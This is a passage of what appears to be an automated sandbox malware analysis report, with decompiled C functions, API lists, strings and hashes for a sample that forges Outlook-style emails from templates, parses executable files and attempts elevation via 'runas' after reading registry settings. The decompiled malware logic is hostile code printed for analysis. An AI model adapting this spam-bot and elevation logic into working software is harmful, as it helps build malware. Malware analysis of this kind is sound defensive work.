					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
				} else {
					_push(_t94 - 0x90);
					 *((intOrPtr*)(_t94 + 0x6c)) = E0040A7A3(_t47, _t47);
				}
				_t48 = E0040ECA5();
				_t77 = 0xe;
				_t50 = E0040ECA5();
				_t92 = "%OUTLOOK_BND_";
				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
				_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				while(1) {
					_t103 = _t53;
					if(_t53 == 0) {
						break;
					}
					_t55 = E0040EDAC(_t53 + 0xd);
					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
					__eflags = _t81;
					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
					E0040EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
					_t98 = _t98 + 0x40;
					_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				}
				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
				E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
				return E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
			}

APIs

GetLocalTime.KERNEL32(?), ref: 0040AD98
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6

Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F

Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2

wsprintfA.USER32 ref: 0040AEA5

Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9

wsprintfA.USER32 ref: 0040AE4F
wsprintfA.USER32 ref: 0040AE5E

Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0

Strings

%s%d, xrefs: 0040AE58
%OUTLOOK_BND_, xrefs: 0040AE0F, 0040AE14, 0040AE57, 0040AE76
%OUTLOOK_HST, xrefs: 0040AEC5
%04x%08.8lx$%08.8lx$%08x@%s, xrefs: 0040AE9F
----=_NextPart_%03d_%04X_%08.8lX.%08.8lX, xrefs: 0040AE49
127.0.0.1, xrefs: 0040ADEB
%OUTLOOK_MID, xrefs: 0040AEAE

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
API String ID: 3631595830-1816598006
Opcode ID: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
Opcode Fuzzy Hash: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040675C, Relevance: 19.7, APIs: 13, Instructions: 199
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040675C(CHAR* _a4, long* _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				struct _OVERLAPPED* _v24;
				long _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				void _v68;
				long _v72;
				void _v132;
				intOrPtr _v320;
				signed int _v360;
				signed int _v374;
				void _v380;
				void* _t85;
				long _t88;
				long _t102;
				struct _OVERLAPPED* _t103;
				long _t115;
				long _t120;
				signed int _t143;
				void* _t146;

				_v16 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 0x80);
				}
				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				_v12 = _t85;
				if(_t85 == 0xffffffff) {
					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
				}
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 2);
				}
				if(_v12 != 0xffffffff) {
					_t88 = GetFileSize(_v12, 0);
					_v8 = _t88;
					if(_t88 == 0xffffffff || _t88 == 0) {
						L31:
						_v8 = 0;
					} else {
						_a12 = 0;
						_v28 = 0;
						if(ReadFile(_v12,  &_v132, 0x40,  &_a12, 0) == 0 || SetFilePointer(_v12, _v72, 0, 0) == 0xffffffff || ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0) == 0 || SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0) == 0xffffffff) {
							goto L31;
						} else {
							_v20 = 0;
							_v24 = 0;
							if(0 < _v374) {
								while(1) {
									_t115 = 0x28;
									_a12 = _t115;
									if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
										break;
									}
									_t143 = _v374 & 0x0000ffff;
									if(_v24 != _t143 - 1) {
										_t120 = _v48 + _v52;
									} else {
										_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
									}
									_a12 = _t120;
									if(_v20 < _t120) {
										_v20 = _t120;
									}
									_v24 = _v24 + 1;
									if(_v24 < _t143) {
										continue;
									} else {
									}
									goto L23;
								}
								_v8 = 0;
							}
							L23:
							if(_v24 >= (_v374 & 0x0000ffff)) {
								_t102 = _v20;
								if(_v8 > _t102) {
									_v8 = _t102;
								}
								_t103 = E0040EBCC(_v8);
								_v16 = _t103;
								if(_t103 == 0) {
									goto L31;
								} else {
									if(SetFilePointer(_v12, 0, 0, 0) == 0xffffffff) {
										L30:
										_v8 = 0;
										E0040EC2E(_v16);
										_v16 = 0;
									} else {
										_t146 = _v16;
										if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
											goto L30;
										} else {
											 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
											_v8 = _v20;
										}
									}
								}
							}
						}
					}
					CloseHandle(_v12);
				}
				 *_a8 = _v8;
				return _v16;
			}

0x0040676a
0x0040676d
0x00406778
0x0040677e
0x0040677e
0x0040679a
0x0040679c
0x004067a2
0x004067b2
0x004067b2
0x004067b8
0x004067bf
0x004067bf
0x004067c9
0x004067d3
0x004067d9
0x004067df
0x0040696b
0x0040696b
0x004067ed
0x00406801
0x00406804
0x0040680b
0x00000000
0x00406867
0x00406869
0x0040686c
0x00406876
0x00406878
0x0040687a
0x00406881
0x0040688f
0x00000000
0x00000000
0x00406891
0x0040689e
0x004068ba
0x004068a0
0x004068b2
0x004068b2
0x004068bd
0x004068c3
0x004068c5
0x004068c5
0x004068c8
0x004068ce
0x00000000
0x00000000
0x004068d0
0x00000000
0x004068ce
0x004068d2
0x004068d2
0x004068d5
0x004068df
0x004068e5
0x004068eb
0x004068ed
0x004068ed
0x004068f3
0x004068f9
0x004068fe
0x00000000
0x00406900
0x0040690b
0x0040695a
0x0040695d
0x00406960
0x00406966
0x0040690d
0x0040690d
0x00406920
0x00000000
0x00406922
0x0040694f
0x00406955
0x00406955
0x00406920
0x0040690b
0x004068fe
0x004068df
0x0040680b
0x00406971
0x00406971
0x0040697f
0x00406986

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,73B743E0,00000000), ref: 0040677E
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,73B743E0,00000000), ref: 0040679A
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,73B743E0,00000000), ref: 004067B0
SetFileAttributesA.KERNEL32(?,00000002,?,73B743E0,00000000), ref: 004067BF
GetFileSize.KERNEL32(000000FF,00000000,?,73B743E0,00000000), ref: 004067D3
ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,73B743E0,00000000), ref: 00406807
SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040681F
ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,73B743E0,00000000), ref: 0040683E
SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040685C
ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,73B743E0,00000000), ref: 0040688B
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,73B743E0,00000000), ref: 00406906
ReadFile.KERNEL32(000000FF,?,00000000,00408244,00000000,?,73B743E0,00000000), ref: 0040691C
CloseHandle.KERNEL32(000000FF,?,73B743E0,00000000), ref: 00406971

Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: File$Read$Pointer$AttributesCreateHeap$CloseFreeHandleProcessSize
String ID:
API String ID: 2622201749-0
Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00409326, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 284
registryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00409326(void* __ecx, void* __edx) {
				void* __ebx;
				char _t88;
				void* _t89;
				int _t92;
				void* _t96;
				signed int _t97;
				signed int _t100;
				signed int _t103;
				char* _t106;
				char* _t111;
				signed int _t112;
				char* _t116;
				signed int _t117;
				int _t119;
				void* _t146;
				signed int _t155;
				int _t161;
				signed int _t165;
				signed int _t167;
				void* _t168;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t176;

				_t146 = __ecx;
				_t168 = _t170 - 0x60;
				E00401910(0x19bc);
				 *(_t168 - 0x58) = 0x9c;
				if(GetVersionExA(_t168 - 0x58) == 0) {
					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
					_t9 = _t168 + 0x58;
					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
					__eflags =  *_t9;
				} else {
					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
				}
				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
				if(_t88 == 0) {
					 *(_t168 - 0x15c) = _t88;
				}
				_push( *((intOrPtr*)(_t168 + 0x70)));
				_t89 = _t168 - 0x15c;
				if( *(_t168 + 0x78) == 0) {
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8,  &E00410918, 0xbd, 0xe4, 0xc8));
					_t172 = _t170 + 0x40;
				} else {
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8, 0x4109d8, 0x4d, 0xe4, 0xc8));
					_t172 = _t170 + 0x38;
				}
				 *(_t168 + 0x78) = _t92;
				E0040EE2A(_t146, 0x4122f8, 0, 0x100);
				_t173 = _t172 + 0xc;
				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
					E0040EF00(_t168 - 0x15c, E00406CC9(_t146));
					E0040EF1E(_t168 - 0x15c, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8));
					_push(_t168 - 0x15c);
					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00402544(0x4122f8,  &E00410888, 0x82, 0xe4, 0xc8));
					E0040EE2A(_t146, 0x4122f8, 0, 0x100);
					_t173 = _t173 + 0x50;
				}
				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
				 *(_t168 + 0x5c) = E00406EDD();
				if( *(_t168 + 0x58) < 0x60) {
					_t165 =  *(_t168 + 0x78);
					_t161 = 0;
					__eflags = 0;
					L33:
					__eflags =  *(_t168 + 0x5c) - _t161;
					if( *(_t168 + 0x5c) == _t161) {
						L38:
						_push(_t168 - 0x95c);
						_push(_t161);
						L39:
						_t96 = E004091EB();
						__eflags =  *0x412180 - _t161; // 0x0
						if(__eflags != 0) {
							 *0x412180 =  *0x412180 | _t165;
							__eflags =  *0x412180;
						}
						__eflags = _t96 - 0x2a;
						_t81 = _t96 == 0x2a;
						__eflags = _t81;
						_t97 = 0 | _t81;
						L42:
						return _t97;
					}
					_t100 = E00401820(_t168 + 0x54, _t168 + 0x78);
					__eflags = _t100;
					if(_t100 != 0) {
						_push(_t168 - 0x95c);
						_push("runas");
						goto L39;
					}
					_t103 =  *(_t168 + 0x78) | 0x61080000;
					__eflags = _t103;
					 *0x412180 = _t103;
					 *0x41217c =  *(_t168 + 0x54);
					if(_t103 != 0) {
						 *0x412180 = _t103 | _t165;
					}
					L31:
					_t97 = 0;
					goto L42;
				}
				 *(_t168 + 0x4c) = 4;
				 *(_t168 + 0x44) = 5;
				 *(_t168 + 0x48) = 1;
				_t106 = E00402544(0x4122f8,  &E0041084C, 0x3a, 0xe4, 0xc8);
				_t175 = _t173 + 0x14;
				if(RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50) == 0) {
					_t111 = E00402544(0x4122f8, 0x410830, 0x1b, 0xe4, 0xc8);
					_t176 = _t175 + 0x14;
					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c);
					__eflags = _t112;
					if(_t112 == 0) {
						_t116 = E00402544(0x4122f8, 0x410818, 0x16, 0xe4, 0xc8);
						_t176 = _t176 + 0x14;
						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c);
						__eflags = _t117;
						if(_t117 != 0) {
							 *(_t168 + 0x78) = 0x3000;
						}
					} else {
						 *(_t168 + 0x78) = 0x2000;
					}
					RegCloseKey( *(_t168 + 0x50));
					_t165 =  *(_t168 + 0x78);
				} else {
					_t165 = 0x1000;
				}
				_t161 = 0;
				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
					if( *(_t168 + 0x5c) <= _t161) {
						goto L38;
					}
					_t119 =  *(_t168 - 0x4c);
					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
						 *0x41217c = _t119;
						_t167 = _t165 | 0x61080106;
						__eflags = _t167;
						goto L30;
					} else {
						if(E0040F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
							 *0x41217c = _t161;
							_t167 = _t165 | 0x61080107;
							L30:
							 *0x412180 = _t167;
							goto L31;
						}
						_t97 = E004018E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
						if(_t97 == _t161) {
							_t155 =  *(_t168 + 0x78) | 0x61080000;
							 *0x412180 = _t155;
							 *0x41217c =  *(_t168 + 0x5c);
							if(_t155 != 0) {
								 *0x412180 = _t155 | _t165;
							}
						}
						goto L42;
					}
				} else {
					goto L33;
				}
			}

0x00409326
0x00409327
0x00409330
0x00409339
0x00409348
0x00409358
0x0040935c
0x0040935c
0x0040935c
0x0040934a
0x00409353
0x00409353
0x00409375
0x0040937d
0x0040937f
0x0040937f
0x0040938c
0x00409394
0x004093a2
0x004093d9
0x004093dc
0x004093dd
0x004093e0
0x004093e3
0x004093e6
0x004093e9
0x004093ec
0x0040940c
0x00409412
0x004093a4
0x004093a4
0x004093a5
0x004093a8
0x004093ab
0x004093ae
0x004093b1
0x004093ce
0x004093d4
0x004093d4
0x0040941d
0x00409420
0x00409425
0x0040942c
0x00409441
0x0040945d
0x0040946b
0x0040948d
0x0040949b
0x004094a0
0x004094a0
0x004094a3
0x004094b0
0x004094b3
0x0040962f
0x00409632
0x00409632
0x00409634
0x00409634
0x00409637
0x0040967b
0x00409681
0x00409682
0x00409683
0x00409683
0x0040968a
0x00409690
0x00409692
0x00409692
0x00409692
0x0040969a
0x0040969d
0x0040969d
0x004096a0
0x004096a2
0x004096a9
0x004096a9
0x00409641
0x00409648
0x0040964a
0x00409673
0x00409674
0x00000000
0x00409674
0x00409652
0x00409652
0x00409657
0x0040965c
0x00409662
0x00409666
0x00409666
0x0040962b
0x0040962b
0x00000000
0x0040962b
0x004094ce
0x004094d5
0x004094dc
0x004094e3
0x004094e8
0x004094f9
0x0040951a
0x0040951f
0x00409526
0x0040952c
0x0040952e
0x00409551
0x00409556
0x0040955d
0x00409563
0x00409565
0x00409567
0x00409567
0x00409530
0x00409530
0x00409530
0x00409571
0x00409577
0x004094fb
0x004094fb
0x004094fb
0x0040957a
0x0040957f
0x0040958d
0x00000000
0x00000000
0x00409597
0x0040959a
0x0040961a
0x0040961f
0x0040961f
0x00000000
0x004095a3
0x004095c0
0x0040960c
0x00409612
0x00409625
0x00409625
0x00000000
0x00409625
0x004095d1
0x004095db
0x004095e7
0x004095ed
0x004095f3
0x004095f9
0x00409601
0x00409601
0x004095f9
0x00000000
0x004095db
0x00000000
0x00000000
0x00000000

APIs

GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
wsprintfA.USER32 ref: 004093CE
wsprintfA.USER32 ref: 0040940C
wsprintfA.USER32 ref: 0040948D
RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571

Strings

runas, xrefs: 00409674

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
String ID: runas
API String ID: 3696105349-4000483414
Opcode ID: 4098d49489a1a58f2d44698bc399054650fb9812435130c3968b7db0ab9e05d5
Instruction ID: 7d6f16c0e63263610e399f3f049f45e0da260e43ae629b5557d7a5820381a87a
Opcode Fuzzy Hash: 4098d49489a1a58f2d44698bc399054650fb9812435130c3968b7db0ab9e05d5
Instruction Fuzzy Hash: 51A171B2540208BBEB21DFA1CC45FDF3BACAB44344F104437FA05E6192D7B999848FA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F315, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 103networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(0040CA1D), ref: 0040F34D
socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
closesocket.WS2_32(00000000), ref: 0040F375

Strings

ps, xrefs: 0040F375, 0040F3A0
time_cfg, xrefs: 0040F323

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: closesockethtonssocket
String ID: ps$time_cfg
API String ID: 311057483-1008165782
Opcode ID: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
Opcode Fuzzy Hash: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3C5, Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v132;
				void* _t46;
				char* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				E00405CE1(_a4, 0x3e800, _a16, 0, 0);
				E0040EF00( &_v132, "%FROM_EMAIL");
				E00405CE1( &_v132, 0x64, _a16, 0, 0);
				_t71 = E0040ED03( &_v132, 0x40);
				_t77 = _t76 + 0x38;
				_t83 = _t71;
				if(_t71 != 0) {
					_t7 = _t71 + 1; // 0x1
					E0040EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
					 *_t71 = 0;
					E0040EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
					_t77 = _t77 + 0x28;
				}
				_t72 = _a12;
				E0040EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
				E0040EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
				_t73 = _a4;
				E0040EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
				_t46 = E0040F0CB( &_v132);
				_push(0);
				_push( &_v132);
				_push(_t46);
				E0040F133();
				E0040EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
				_push(_t73);
				E0040AD89( &_v132, _t83);
				E0040B211(0,  &_v132, 0);
				E0040EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 5);
				E0040EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 0xfffffffb);
				E0040EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
				_t75 = _a8;
				 *((char*)(E0040AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
				return _t75;
			}

APIs

wsprintfA.USER32 ref: 0040B467

Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0

Strings

%P5DATE, xrefs: 0040B4F2
%TO_USER, xrefs: 0040B488
%s@%s, xrefs: 0040B461
%FROM_DOMAIN, xrefs: 0040B41E
%TO_HASH, xrefs: 0040B4B0
%M5DATE, xrefs: 0040B50F
%FROM_USER, xrefs: 0040B431
%TO_EMAIL, xrefs: 0040B473
%TO_DOMAIN, xrefs: 0040B44B
%DATE, xrefs: 0040B4D2
%FROM_EMAIL, xrefs: 0040B3E9

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: lstrlen$wsprintf
String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
API String ID: 1220175532-2340906255
Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9

Uniqueness

Uniqueness Score: -1.00%

Function 00471FE6, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 205libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00472016
GetSystemInfo.KERNEL32(?), ref: 00472038
GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 00472053
GetProcAddress.KERNEL32(00000000), ref: 0047205A
GetCurrentProcess.KERNEL32(?), ref: 0047206B
GetTickCount.KERNEL32 ref: 00472219

Part of subcall function 00471E2F: GetComputerNameA.KERNEL32(?,0000000F), ref: 00471E65

Strings

flags_upd, xrefs: 0047208E, 00472093, 004720CC
work_srv, xrefs: 004720AE
hi_id, xrefs: 00472166, 0047216B, 00472183
localcfg, xrefs: 0047207A, 00472081, 00472094, 004720CD, 004720DC, 00472102, 00472121, 00472137, 0047214F, 0047216C, 00472184, 004721A0, 004721C0

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
String ID: flags_upd$hi_id$localcfg$work_srv
API String ID: 4207808166-1391650218
Opcode ID: 95941b0076ff9e03750b1b60fd5c4485c08a11f1e0340fac45349bf3b379a799
Instruction ID: 61711e70ffd6133ef61d9b64c037848769f545482d67d0baae48f697dac662a8
Opcode Fuzzy Hash: 95941b0076ff9e03750b1b60fd5c4485c08a11f1e0340fac45349bf3b379a799
Instruction Fuzzy Hash: C451E670504348AFE330AF668C85FA77BECFB45708F00896FF95D82242D6BCA9448769

Uniqueness

Uniqueness Score: -1.00%

Function 00402011, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x4122f4 & 0x00000001) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000001;
					 *0x4122f0 = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000002) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000002;
					 *0x4122ec = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000004) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000004;
					 *0x4122e8 = E0040F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114));
				if(_t35 -  *0x4122e0 > 0xdbba0) {
					_t58 =  *0x412000; // 0x410288
					_t103 = 0;
					if( *_t58 != 0) {
						_t60 = 0x412000;
						do {
							if(E00402684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
								if(E00401978(_t61, 0x50) != 0) {
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14;
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x412000 + _t103 * 4;
						} while ( *((char*)( *(0x412000 + _t103 * 4))) != 0);
					}
					L14:
